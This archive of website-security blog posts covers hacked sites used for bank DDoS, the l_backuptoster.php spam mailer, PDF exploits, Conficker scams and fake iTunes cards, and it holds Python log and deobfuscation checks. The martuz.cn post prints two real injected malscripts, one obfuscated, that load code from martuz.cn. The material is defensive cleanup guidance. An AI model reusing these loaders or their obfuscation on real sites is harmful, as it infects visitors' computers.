Category Archives: Current Event Attacks

“Why would hackers want my site?”

This is a question we’re asked all the time.

As I read this article I thought it was one good answer to why hackers want your site:

http://www.darkreading.com/threat-intelligence/167901121/security/attacks-breaches/240145920/bank-ddos-attacks-employ-web-servers-as-weapons.html

One comment I have about the above article: it uses the term web servers when it should be saying web sites.

This article provides more insight into the attacks.

Bank DDoS Attacks Using Compromised Web Servers as Bots

When you read the second article, notice the username and password used on the website: admin/admin. We see this frequently.

We have cleaned thousands of websites that are being used in these DDoS attacks on banks. The cybercriminals find a point of entry, exploit it, upload their script files and then coordinate the attack from a remote location.

First line of defense is a strong password.

The next line of defense is to keep your software (WordPress, Joomla, whatever) up-to-date at all times.

If you have any thoughts or comments about this, please share.

Thank you.

l_backuptoster.php still showing

Over the past few weeks we’ve cleaned a number of websites that were infected with l_backuptoster.php and while it’s been around a while, we thought we would share our experience. This infection isn’t so much about website security as it is about computer security, but it does eventually affect your website security as well – which is why we’re involved.

For those of you unfamiliar with this little gem, it’s used by hackers to send SPAM. It is uploaded to the website via FTP – which means that the FTP password has been compromised, or worse, the hosting account password has been compromised.

In the most recent instances of websites infected with the l_backuptoster.php file, a new FTP account was created on the hosting account and that was used to upload the files. The file is uploaded with 2 other files, body1.txt and body.txt, used, then deleted until the next time the hacker wants to send SPAM.

Here is what you might see in your FTP logs:

Tue Dec 20 06:32:41 2011 0 xx.xx.xx.xxx 320 /home/path/public_html/body1.txt b _ i r candy@yourdomain ftp 1 * c
Tue Dec 20 06:32:42 2011 0 xx.xx.xx.xxx 292 /home/path/public_html/body.txt b _ i r candy@yourdomain ftp 1 * c
Tue Dec 20 06:32:42 2011 0 xx.xx.xx.xxx 8160 /home/path/public_html/l_backuptoster.php b _ i r candy@yourdomain ftp 1 * c

The xx.xx.xx.xxx would actually be the address where this traffic is originating. The number after it is the file size, followed by the path, and further along the line is the FTP account used.

You see that first the body1.txt file, with a size of 320, was uploaded to the folder shown, followed by body.txt with a size of 292 and finally the l_backuptoster.php file with a size of 8160.

If you’ve been infected with this, and you have your Raw Access Logs activated, you will probably also see entries like these in your access logs:

xx.xx.xx.xxx - - [12/Jan/2012:12:34:58 -0700] "GET /l_backuptoster.php?id=4550&ipAddr=xx.xx.xx.xxx&serv_name=www.yourdomain HTTP/1.1" 200 205 "-" "-"
xx.xx.xx.xxx - - [12/Jan/2012:12:34:58 -0700] "GET /l_backuptoster.php?id=4554&ipAddr=xx.xx.xx.xxx&serv_name=www.yourdomain HTTP/1.1" 200 205 "-" "-"

Again, the xx.xx.xx.xxx would actually show the originating IP address. In our work, we track down this IP address and report it to the proper people as this is an indication that the originating IP address is being used in a suspicious manner.

In the above log file entries, the ipAddr parameter matches the first IP address and the serv_name parameter would be your URL, that is, the infected site’s URL.

You will probably see hundreds of these lines if your website is being used with the l_backuptoster.php file.

What we found in each case of a website infected with l_backuptoster.php was that the FTP account used to upload these files was not created by the hosting account owner. The only way this could have been achieved was if the hosting account password had been compromised.

If this is true, then the hackers are no longer just stealing the FTP login credentials; their keyboard loggers are also recording all logins, and since the hackers are very interested in infecting websites, why not create their own FTP account?

As stated earlier, after the activity in the access logs, we found that the 3 files uploaded were deleted so there was no trace. The hackers would simply upload the files again at a later time, use them and delete them.

Without constant watching of the log files, we would not have seen this.

If you have been a victim of the l_backuptoster.php website infection, here’s what you should do:

  • Change your hosting account password
  • Check your hosting account for unused or unauthorized FTP accounts and delete any that you aren’t familiar with
  • Create new passwords for remaining FTP accounts
  • Perform a full system virus scan with either Avast! or AVG anti-virus and use Malwarebytes as a secondary scanner. If you’re using a Mac try BitDefender
  • Check your log files on a regular basis. Download them to your computer and search for ‘l_backuptoster.php’
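The log check in the last step can go beyond a search for one file name. As an added example (not the author's tooling), this Python script reads FTP transfer-log lines in the format shown above and flags PHP uploads by FTP accounts the owner did not create, then counts access-log requests to those scripts or to any PHP file called with the ipAddr and serv_name parameters. The log lines, the 203.0.113.7 and 198.51.100.20 addresses, the owner@yourdomain account and the 5-second window are constructed assumptions.

```python
import re
from collections import Counter
from datetime import datetime, timedelta
from posixpath import basename
from urllib.parse import urlsplit, parse_qs

WINDOW = timedelta(seconds=5)  # assumption: helper files arrive within seconds of the script
ACCESS = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) [^"]*" (\d{3}) ')

def parse_xferlog(line):
    """Split one transfer-log line: 8 fields, the file name, then 9 fields."""
    t = line.split()
    if len(t) < 18:
        return None
    return {
        "when": datetime.strptime(" ".join(t[:5]), "%a %b %d %H:%M:%S %Y"),
        "host": t[6], "size": int(t[7]), "path": " ".join(t[8:-9]),
        "incoming": t[-7] == "i", "account": t[-5], "complete": t[-1] == "c",
    }

def suspicious_drops(xfer_lines, known_accounts):
    """Completed .php uploads by unknown FTP accounts, with the files that
    the same account and host uploaded within WINDOW of the script."""
    ups = [r for r in map(parse_xferlog, xfer_lines)
           if r and r["incoming"] and r["complete"]]
    drops = []
    for r in ups:
        if r["path"].lower().endswith(".php") and r["account"] not in known_accounts:
            helpers = sorted(
                basename(o["path"]) for o in ups
                if o is not r and o["account"] == r["account"]
                and o["host"] == r["host"] and abs(o["when"] - r["when"]) <= WINDOW)
            drops.append({"script": basename(r["path"]), "account": r["account"],
                          "host": r["host"], "helpers": helpers})
    return drops

def mailer_hits(access_lines, scripts):
    """Count 200 responses per (script, client) for dropped scripts or for
    any .php requested with both ipAddr and serv_name parameters."""
    hits = Counter()
    for line in access_lines:
        m = ACCESS.match(line)
        if not m or m.group(3) != "200":
            continue
        url = urlsplit(m.group(2))
        name = basename(url.path)
        params = set(parse_qs(url.query))
        if name in scripts or (name.endswith(".php") and {"ipAddr", "serv_name"} <= params):
            hits[(name, m.group(1))] += 1
    return hits

# Constructed sample lines modelled on the entries shown in this post.
XFERLOG_SAMPLE = """\
Tue Dec 20 06:30:02 2011 1 198.51.100.20 5120 /home/path/public_html/index.html a _ i r owner@yourdomain ftp 1 * c
Tue Dec 20 06:32:41 2011 0 203.0.113.7 320 /home/path/public_html/body1.txt b _ i r candy@yourdomain ftp 1 * c
Tue Dec 20 06:32:42 2011 0 203.0.113.7 292 /home/path/public_html/body.txt b _ i r candy@yourdomain ftp 1 * c
Tue Dec 20 06:32:42 2011 0 203.0.113.7 8160 /home/path/public_html/l_backuptoster.php b _ i r candy@yourdomain ftp 1 * c
""".splitlines()

ACCESS_SAMPLE = """\
203.0.113.7 - - [20/Dec/2011:06:33:10 -0700] "GET /l_backuptoster.php?id=4550&ipAddr=203.0.113.7&serv_name=www.yourdomain HTTP/1.1" 200 205 "-" "-"
203.0.113.7 - - [20/Dec/2011:06:33:10 -0700] "GET /l_backuptoster.php?id=4554&ipAddr=203.0.113.7&serv_name=www.yourdomain HTTP/1.1" 200 205 "-" "-"
198.51.100.20 - - [20/Dec/2011:06:40:00 -0700] "GET /index.html HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
""".splitlines()

if __name__ == "__main__":
    drops = suspicious_drops(XFERLOG_SAMPLE, known_accounts={"owner@yourdomain"})
    for d in drops:
        print("unknown account", d["account"], "uploaded", d["script"], "with", d["helpers"])
    for (script, client), n in mailer_hits(ACCESS_SAMPLE, {d["script"] for d in drops}).items():
        print(n, "requests to", script, "from", client)
```

Because the files are deleted after each run, the transfer log and access log are the only place this activity shows up, so run the check against every downloaded log rather than against the files currently on the site.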

One point to remember, do not ever have your browser save your hosting account password or any other passwords. We have copies of the viruses hackers use to steal passwords and they work extremely well on browser saved passwords!

If you’ve been infected by this and have more to add, please leave a comment. If you need help in cleaning this up and getting everything “locked down”, please email me at traef@wewatchyourwebsite.com or call at (847)728-0214.

Thank you.


New Website Infection Method

Working with a website owner recently, we came across a new method of delivering infectious code (drive-by downloads) – at least it’s a method we’ve never seen before.

The scenario: Website owner gets the email from Google telling them their website is serving up malscripts to visitors and adds “This website can harm your computer” to all their SERPs. The website owner can’t find the malscript anywhere.

We scan their site and find nothing. Our scanning spiders their site, all links and even spiders the sites they link to.

Someone from another vendor says they found malware on a webpage that we didn’t even see. I start screaming “Why didn’t we find this page?” We try to manually download the page and we get a 404 error – page not found.

Turns out, the page didn’t even exist. We try to access the non-existent webpage with a sandboxed browser (sandboxed means it’s a system that can’t be infected due to all the security measures we’ve taken. It also records any attempted file changes, registry changes, etc.).

Bam! We see in the 404 error page that there’s some redirect code in there trying to access martuz.cn. Interesting.

We look at the address bar in our browser and see that it didn’t redirect to a custom 404 error page, it still shows the URL we typed in with the john_doe.html page at the end. We know from our scan that this client is running their website on an Apache 2.0 server.

Our research showed that in the Apache installation folder under a sub-folder of “error”, the HTTP_NOT_FOUND file had been modified and the malscript added.

Which begs the question, why would a cybercriminal go through all that trouble to only deliver the martuz.cn malscript to people who type in a non-existent webpage?

Not sure on that one.

We also found these files had been added to the default directory on the webserver:

  • bad_gateway.html
  • bad_request.html
  • forbidden.html
  • internal_server_error.html
  • method_not_allowed.html
  • not_acceptable.html
  • not_found.html
  • not_implemented.html
  • precondition_failed.html
  • proxy_authentication_required.html
  • request-uri_too_long.html
  • unauthorized.html
  • unsupported_media_type.html

Each of these pages looked like the default Apache error pages but with the martuz.cn malscript inserted between the closing HEAD tag and the opening BODY tag.

We found that Apache uses one of 4 options when handling error responses:

  1. output a simple hardcoded error message
  2. output a customized message
  3. redirect to a local URL-path to handle the problem/error
  4. redirect to an external URL to handle the problem/error

It didn’t appear to be redirecting as the URL in the address bar was still what we had entered. So we eliminated options 3 & 4.

At first when we saw the malscript only being delivered with 404 responses, we thought that maybe there must be some line in the httpd.conf file like:

ErrorDocument 404 /404.html

But there was no such entry in the httpd.conf file. It was definitely the default Apache error page with the martuz malscript inserted.

Further investigation found our theory was correct.

Lesson: When trying to find all the infectious pages on your site, don’t overlook the non-existent webpages as well. In this particular case, those were the only files serving infectious code.

How To Find martuz.cn in Websites

After our post earlier today about how martuz.cn is the new domain for gumblar infections, we’ve received hundreds of emails from people (I guess too embarrassed to post their question in an open forum), asking how to find martuz.cn in websites.

We’ll use a utility program called wget. Wget allows you to download the “raw” webpage from a site. It’s used quite heavily in the Linux world, but there is also a version for Windows users.

You can download wget from here: http://gnuwin32.sourceforge.net/packages/wget.htm

I recommend you select the Complete Package, except sources.

Download it, install it – you can just accept all of the defaults.

Now open a command prompt (Start->Run->cmd->OK).

Change directories like this: cd "\Program Files\GnuWin32\bin" <enter>

Let me explain a little about the options we’ll use with wget.

Sometimes these infectious malscripts like martuz.cn will only show themselves when viewed with a specific browser. In recent days, martuz.cn won’t activate if you visit one of their infectious websites with Google Chrome as your browser. To be sure, we’ll set our user agent (which is what gets checked for your current browser) to Internet Explorer on a Windows XP computer.

Other times infectious malscripts like martuz.cn or certain variations of gumblar.cn will only try to infect a visitor’s PC if the visitor is coming to the infectious site from a Google search. In that case we would need to set “referer” to Google’s home page.

Here’s how we do it with wget. You would enter this in your command prompt:

wget --user-agent="Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)" --referer=http://www.google.com http://www.yoursitehere.com

Obviously you would change the http://www.yoursitehere.com with your webpage. For instance, if your website is http://www.joesbarandgrill.com you would simply use the above command but with http://www.joesbarandgrill.com in place of http://www.yoursitehere.com

This will download your homepage into the current directory on your PC.

If your site has already been indexed by Google and found to have infectious webpages, you can use this Google search to find out which pages Google has found malscripts on.

site:yoursitehere.com

The Search Engine Results Pages (SERPs) will show you each page from your site and any pages that Google thinks has malscripts on them will display their warning “This site may harm your computer”.

You should use wget for each page that Google lists as hosting malscripts by providing the complete URL in the wget command line.

For instance, if you have a webpage contactus.html and it’s listed in Google SERPs as hosting malscripts, then you would use this wget command:

wget --user-agent="Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)" --referer=http://www.google.com http://www.yoursitehere.com/contactus.html

That will download contactus.html into your current directory and you would scan that for any malscripts.

Now that you have downloaded your webpages into your current directory, you can begin the process of searching through the files.

While at your command prompt type in:

edit index.html

Then use search->find and type in the word: mart

The reason you don’t search for martuz.cn is that the cybercriminals know that would make it too easy for you to find. Their script (one of them we’ve found) looks like this:

var a="Script Engine",b="Version()+",j="",u=navigator.userAgent;
if((u.indexOf("Chrome")<0)&&(u.indexOf("Win")>0)&&(u.indexOf("NT 6")<0)&&(document.cookie.indexOf("miek=1")<0)&&(typeof(zrvzts)!=typeof("A"))){
zrvzts="A";eval("if(window."+a+")j=j+"+a+"Major"+b+a+"Minor"+b+a+"Build"+b+"j;");
document.w rite("<script src=//mar tu"+"z.cn/vid/?id="+j+"><\/script>");}

So you can see that if you were to scan for martuz, you’d never find it because their malscript uses string concatenation to “build” martuz.cn (martu + z.cn)

Here’s another martuz script we found:

(f u n c t i o n(){var G33z1='%';var KlKj='va-72-20a-3d-22-53c-72i-70t-45n-67-69ne-22-2cb-3d-22-56-65-72-73-69o-6e(-29+-22-2cj-3d-22-22-2c-75-3d-6eavigato-72-2eus-65-72-41-67ent-3bi-66-28-28u-2e-69ndexOf(-22Chrome-22-29-3c0-29-26-26(u-2e-69ndexOf(-22W-69n-22-29-3e0)-26-26-28u-2ein-64e-78Of(-22-4eT-206-22)-3c0)-26-26(d-6fcument-2ecookie-2e-69-6edex-4ff-28-22-6die-6b-3d1-22)-3c-30)-26-26(type-6ff-28z-72vzts)-21-3dty-70e-6ff(-22A-22)-29)-7bz-72v-7ats-3d-22-41-22-3beval(-22if(window-2e-22-2b-61+-22)j-3dj+-22+a-2b-22Majo-72-22-2bb+a-2b-22Mi-6eo-72-22-2bb+a+-22-42uild-22+b+-22-6a-3b-22)-3bdoc-75m-65nt-2e-77rite(-22-3c-73-63ri-70-74-20src-3d-2f-2fm-61rtu-22+-22z-2ec-6e-2f-76id-2f-3fid-3d-22+j+-22-3e-3c-5c-2fs-63ri-70-74-3e-22)-3b-7d';var m8nw=KlKj.replace(/-/g,G33z1);e val(unescape(m8nw))})();

If you look at this second malscript you won’t find martuz or mart or any other text even close to the first malscript. If you find any script like this in your downloaded webpages, more than likely your site is serving infectious code. This is an example of the steps cybercriminals will go through to obfuscate their malscripts.
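Searching the downloaded pages for “mart” only catches the first script. As an added example (not code from the original post), this Python sketch undoes both tricks shown above, the split string literals and the layer where another character stands in for % before unescape, and reports script hosts that appear only after decoding. The sample pages are constructed, malhost.example is a placeholder domain, and the threshold of eight escapes is an assumption.

```python
import re
from urllib.parse import unquote

HEX = r"[0-9A-Fa-f]{2}"
LITERAL = re.compile(r"'((?:[^'\\]|\\.)*)'" + "|" + r'"((?:[^"\\]|\\.)*)"')
CONCAT = re.compile(r"""(["'])\s*\+\s*\1""")  # the "+" in "martu"+"z.cn"
SRC_HOST = re.compile(r"""src\s*=\s*["']?(?:https?:)?//([^/"'>\s]+)""", re.I)

def decode_layer(literal):
    """Undo a delimiter-for-% escape layer, or return None if there is none.

    Heuristic: the punctuation character most often followed by two hex
    digits is taken as the stand-in for '%'. Stand-ins not followed by a
    hex pair are left unchanged.
    """
    best_hits, best_delim = 0, None
    for delim in set(re.findall(r"[^\w\s]", literal)):
        hits = len(re.findall(re.escape(delim) + HEX, literal))
        if hits > best_hits:
            best_hits, best_delim = hits, delim
    if best_hits < 8:  # assumed threshold: a few accidental matches are normal
        return None
    swapped = re.sub(re.escape(best_delim) + "(?=" + HEX + ")", "%", literal)
    return unquote(swapped, encoding="latin-1")

def views(text, depth=3):
    """Return the text with split literals joined, plus every decoded layer."""
    folded = CONCAT.sub("", text)
    out = [folded]
    if depth > 0:
        for m in LITERAL.finditer(folded):
            decoded = decode_layer(m.group(1) or m.group(2) or "")
            if decoded:
                out.extend(views(decoded, depth - 1))
    return out

def hidden_script_hosts(html):
    """Hosts loaded via src=//host that are not readable in the raw page."""
    raw = html.lower()
    found = []
    for view in views(html):
        for host in SRC_HOST.findall(view):
            if host.lower() not in raw and host not in found:
                found.append(host)
    return found

# Constructed samples. The script sits between </head> and <body>,
# where the injected code was found in the error pages described earlier.
SAMPLE_CONCAT = """<html><head><title>Contact</title></head>
<script>document.write("<script src=//malho"+"st.example/x.js>");</script>
<body>Contact us</body></html>"""

SAMPLE_ESCAPED = """<html><head><title>Contact</title></head>
<script>(function(){var k='%';var p='d-6fc-75m-65nt-2e-77ri-74e-28-22-3cs-63ri-70t-20src-3d-2f-2fm-61lho-22+-22s-74-2eexa-6dple-2fx-2ejs-3e-22-29-3b';var s=p.replace(/-/g,k);eval(unescape(s))})();</script>
<body>Contact us</body></html>"""

SAMPLE_CLEAN = """<html><head><title>Contact</title>
<script src="//cdn.example.org/app.js"></script></head>
<body>Contact us</body></html>"""

if __name__ == "__main__":
    for name, page in (("concat", SAMPLE_CONCAT), ("escaped", SAMPLE_ESCAPED),
                       ("clean", SAMPLE_CLEAN)):
        print(name, hidden_script_hosts(page))
```

Any host this reports deserves a manual look at the page, since a legitimate script has no reason to hide where it loads from.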

You’ll have to scan through each file on your website in order to see if you have any martuz.cn infections. If you do find them, you should scan your PC for any viruses with AVG, Avast or Malwarebytes, clean it, change the FTP password to your site and upload your last known, good backup. You do have a backup, right?

We are working on a video to show you how to move away from FTP and use SSH/SCP instead, but we’re not quite ready with it yet.

If you subscribe to this blog, you’ll get an update when it’s ready.

Thank you. We hope you found this useful. If you have any questions, please email us or post your comments below.

Adobe Acrobat Hit Again

It’s true.

Adobe Acrobat is vulnerable once again. This is getting ridiculous. They have enough money to buy up software companies but yet they can’t invest the time and money to harden their existing products?

They worked so hard to get everyone to use their software. It’s standard on computer installs now. Who doesn’t have Adobe Acrobat Reader on their computer?

With this latest “hole”, I’ve started looking for alternatives and I’ll let you know if and when I find one. But in retrospect, I’d rather stay with a company that is solidly locked into the software market and has a lot to lose if they don’t fix their vulnerabilities, than one that might be a fly-by-night company and leaves me standing out in the cold.

Many in the security community have even coined an acronym for this scenario – YAPE (Yet Another PDF Exploit). You know things are bad when the security community assigns an acronym to it.

Adobe is again recommending that you disable Javascript in Adobe Acrobat. If you followed my instructions last time, you still have Javascript disabled so you’re safe. If for some reason, you didn’t read my last warning about Adobe Acrobat here are the steps to follow:

To turn off Javascript follow these steps:

  1. Launch Adobe Acrobat Reader
  2. Select Edit -> Preferences
  3. Select the Javascript category
  4. Uncheck the “Enable Acrobat Javascript” option
  5. Click “Ok”

It begs the question, “Why does anyone need Javascript in a reader for locked files anyway?” To me, it’s technology looking for a reason.

When Adobe first introduced the Javascript ability, I looked for a way to turn it off. I don’t need it. I don’t want something in my software that allows other people to control what I’m doing.

As of this writing, Adobe is working on a patch. All versions of Adobe Acrobat, on every platform (Mac, Linux and Windows), are vulnerable.

I will keep you updated on this situation or you can follow it on Adobe’s website here:

http://www.adobe.com/support/security/

As always, I recommend you apply the patch as it becomes available as this exploit will allow an attacker to remotely execute commands on your computer and the exploit code is already available.

Our honeypots have not detected any new waves of infectious PDFs in the wild – yet. But sure as, well you know, they will be forthcoming.

Please feel free to pass the link to this posting to your friends and family.

Don't Open That File!

Yes, just when you thought it was safe to open Adobe Acrobat files (with a .pdf extension), it’s not.

Everyone who reads this should update their Adobe Acrobat Reader here: http://www.adobe.com/support/security/bulletins/apsb09-04.html

Hackers (or as some prefer – cybercriminals), have found a new way to use pdf’s to infect computers (CVE-2009-0927) http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0927. By using a legitimate website, or websites, hackers can reach many more unsuspecting web users.

What the cybercriminals are doing is finding legitimate websites they can hack and replacing any pdf files with their infectious pdf’s. Anyone who opens that pdf, either on screen or by downloading it and then opening it, will be subjected to this exploit and could face infection. Some websites have various forms they use for reports, registrations or any of a number of uses.

Frequently the infected webpage is designed to open automatically when you visit the page. Rarely will the website owner know they have an infectious website. Often times the infectious website won’t actually contain the malicious code. The webpage will have a line of javascript that downloads the malicious code from some server in a land far far away.

I usually hear people saying, “I scanned my website with 5 different anti-virus programs and nothing was detected.”

While this doesn’t hurt, rarely will this action find the infected webpage because only the javascript code that “reaches” out to the far away server is on the webpage – and it’s heavily encrypted to avoid easy detection. The actual virus or other malicious code is located on their server and often it’s polymorphic – it changes its shape and size each time it’s downloaded on a user’s PC. This “strategy” helps the infectious code in evading detection by most anti-virus programs.

Hacking of a legitimate website is nothing new in distributing malware as I’ve written about numerous times in other blog postings here.

Update your Adobe Acrobat Reader now!

Let’s be careful out there, huh?

Thank you.

Paul McCartney's Web Site Hacked – "Back in the USSR"

Yes it’s true. The rock n roll icon Paul McCartney had his website hacked. (This attack isn’t necessarily originating in Russia, but I couldn’t refuse the obvious opportunity.)

It’s amazing how certain hackings follow the news. It was just a couple days ago when I was watching the news on TV (yes that old, outdated media) and learned that Paul McCartney and Ringo Starr were going to get back together for a “reunion” tour.

The website hacking could have been purely coincidental, as the toolkit planted on his website – Luckysploit, has been used in many, many recent website malware distributions. It could be that the cybercriminals behind this exploit just happened to find this site vulnerable to their recent attack. I believe it’s irrelevant how or why, their timing was impeccable.

This is another example of social engineering used successfully to infect more computers.

Think of the millions of Beatles fans (my father-in-law is one of them – a fan not a virus victim) hearing about this reunion and flocking to Mr. McCartney’s website to find out where their concerts will be performed only to find out at the next anti-virus scan that they’ve been compromised by a bank login and password stealing virus.

The nerve of these hackers. Using something so “in the news” to lure millions of people to infectious websites that have been planted with malicious code, appearing to be legitimate websites, for the sole purpose of delivering a virus that is currently evading detection by many anti-virus programs.

Is there no shame?

This attack is being carried out by the Zeus botnet. Yes while everyone was watching out for Conficker, many forgot about the other botnets out there.

It’s easy to spot the infectious malware code in the “source” of the web page. All you have to do is look for something that’s impossible to read because it is encrypted and obfuscated to avoid easy detection. Luckily for us, we don’t look for specific infections while scanning websites. Our systems are based on any changes to a website. We pay close attention to changes that include specific keywords, but our alert system is based on any changes made to a website.

Once again the cybercriminals use a popular event to spread their malware. This particular infection will steal banking credentials which are then sold on the open black market. This is one of the cybercriminals’ profit centers. They have many.

Be careful when using the Internet, you never know if you’re getting more than you bargained for.

Other Beatles songs that come to mind with my sub-titles:

“Do You Want to Know a Secret” (about my malware)

“Don’t Ever Change” (my website)

“Don’t Let Me Down” (please click on this infectious link)

“Eight Days a Week” (and I’ll infect you every one of them)

“Everybody’s Got Something to Hide Except Me and My Monkey” (okay maybe my monkey has some malware to hide too)

“Fixing a Hole” (in your website)

“Free as a Bird” (free as in free malware)

“From Me to You” (more malware from me to you)

“Get Back” (to where you can get infected)

“Got To Get You Into My Life” (so I can hack you some more)

“Help!” (I need the services of WeWatchYourWebsite)

“I Am the Walrus” (I live in Belarus) (okay you find something that goes with Walrus)

I could go on, but the Beatles wrote a lot of songs and I need to save server space.

Let’s be careful out there…

What Conficker was – and wasn't

Well, the big April 1st “dooms day” has come and gone.

I’ll admit that even though we really didn’t think anything malicious was going to happen, we did add a Conficker scanner to The Box (our security appliance at www.ebasedsecurity.com) so we could scan our clients’ systems.

Let me explain our thinking. We’ve been following Conficker all along the way. From the first strain to the most recent, we’ve been watching with our honeypots – collecting data and samples and determining what could happen. We’ve seen the changes, what it does and how it communicates with its “mother ship” waiting for its next set of instructions.

When news of Conficker hit mass media, (60 Minutes did a piece on it) our non-technical gut feeling was that the cybercriminals wouldn’t actually do anything malicious with their code. There was too much public awareness.

Keep in mind that if they had, they could have created some real havoc on the Internet. Some experts (my Dad’s definition of an expert is: an ex is a has been and a spurt is a drip under pressure) estimate that anywhere from 10 million to 100 million PCs are infected with Conficker.

If a cybercriminal or a group of cybercriminals have remote control of that many PCs and they decided to launch an attack against some main Internet servers, they could overload them with so much bogus traffic as to basically eliminate them from accessibility.

Now, if they attacked the main DNS servers on the Internet (the servers that convert domain names to IP addresses) could they slow down or shut-down the Internet? Possibly.

However, nothing happened.

Or did it?

What actually happened might be exactly what the cybercriminals wanted.

How many of you did Google searches for Conficker over the past week (the week before April 1)?

Many, many (our research showed that over 1.7 million) people searched for “conficker scanner” or “conficker removal”, “remove conficker”, “find conficker” and numerous other terms.

Did you realize that many of the search results were offering solutions that actually infected your PC? Many of the websites that were displayed as a result of those search terms were created by the cybercriminals!

Could this have been the real intention of the cybercriminals? If so, this could be the biggest social engineering hack of all time. We examined many of these sites and found a number of them (64%) were selling Conficker scanners and removal tools. All of these “tools” we found were actually RATs (Remote Access Trojans) which actually provided the cybercriminals with remote control of the PC it was installed on.

And, “they” (the cybercriminals) got you to pay for it!

Are these guys geniuses or what?

Many of the sites that weren’t selling bogus removal tools tried to infect any PC that visited their site. These infected webpage sites used a variety of sneaky methods to infect PCs. One instance we found actually tried 17 different attacks on all the PCs visiting its infectious website.

If you’ve been following us, you know that legitimate websites serving malware are increasing. This coupled with infected websites serving malware makes the Internet a very dangerous place.

Fortunately for all of our clients with The Box, they don’t have to worry about things like this because The Box doesn’t allow downloads from non-whitelisted websites. What a concept.

That’s what Conficker was and what it wasn’t.

Anyone have comments? (comments that aren’t SPAM)

Bomb Threat SPAM

Cybercriminals are using cleverly crafted SPAM messages to get you to click on a link that supposedly takes you to a Reuters video of bomb blasts in your area.

I say cleverly crafted because the email will change based on where your IP address is. For instance, I received one with a subject line of, “Are you and your friends okay?”.

When I clicked on the link (yes as part of my research), I saw a webpage that showed the Reuters logo with, “Powerful explosion burst in Chicago this morning”. There’s a graphic to see the video with text below that reads, “At least 12 people have been killed and more than 40 wounded in a bomb blast near market in Chicago. Authorities suggested that explosion was caused by “dirty” bomb. Police said the bomb was detonated from close by using electric cables.”

Scanning through our logs of SPAM for our clients using The Box, we’ve been able to see how the message refers to a different major nearby city depending on where the client receives their email.

The video will install some malware via a download. We’ve identified the trojan as a strain of Waled or Waledac depending on your AV.

Other subject lines we’ve seen are: “Take Care!”, “At least 18 killed in your city” (which is interesting as all the emails we’ve seen state that 12 have been killed), “I hope you are not in the city now”, “Bomb blast near you” and a host of others.

We’ve reported before on how clever cybercriminals are to use hype and fear as examples of social engineering to get people to want to click on their links. When clicked, systems become infected.

Cyber threats such as these will continue as long as they’re successful at hooking at least a few million people. Hackers are making good money through their craft and will not stop. Using extreme fear and directing visitors to infectious websites will always be a tactic they pull out every once in a while. This will die down and then in another few months they’ll use some other alarmist strategy and infect some more computers.

That’s what they do.

Fake iTunes cards – next cybercriminal profit center

What if you were offered a $200 iTunes card for less than $5?

How about for $2.60?

Would you buy it?

Apparently cybercriminals based in China have cracked the algorithm used by Apple to generate legitimate iTunes cards. This along with their stolen credit card data has become yet another revenue stream for the cyber-criminals.

What’s really amazing is that you can’t even buy a $200 gift card from Apple. Their denominations are: $15, $25 and $50.

This story originally broke here: http://outdustry.com/2009/03/10/the-chinese-itunes-gift-voucher-trick/ and a little investigation on our part revealed some interesting sites.

We’ve seen some “middle men” insert themselves in this tangled web of deceit. They actually buy the numbers from the original cybercriminals and then resell them to people they know, thus creating a wholesale/distributor type of business. Talk about an affiliate program that pays big dollars!

Some people are offering cards on various auction type websites. (I’m not mentioning any names but one of them rhymes with prepay)

Please know that buying and using these cards is illegal. We’re posting this so you know NOT to buy them and think they’re legit – they’re not.

What will they think of next?

I don’t know, but I’m sure we’ll see it soon.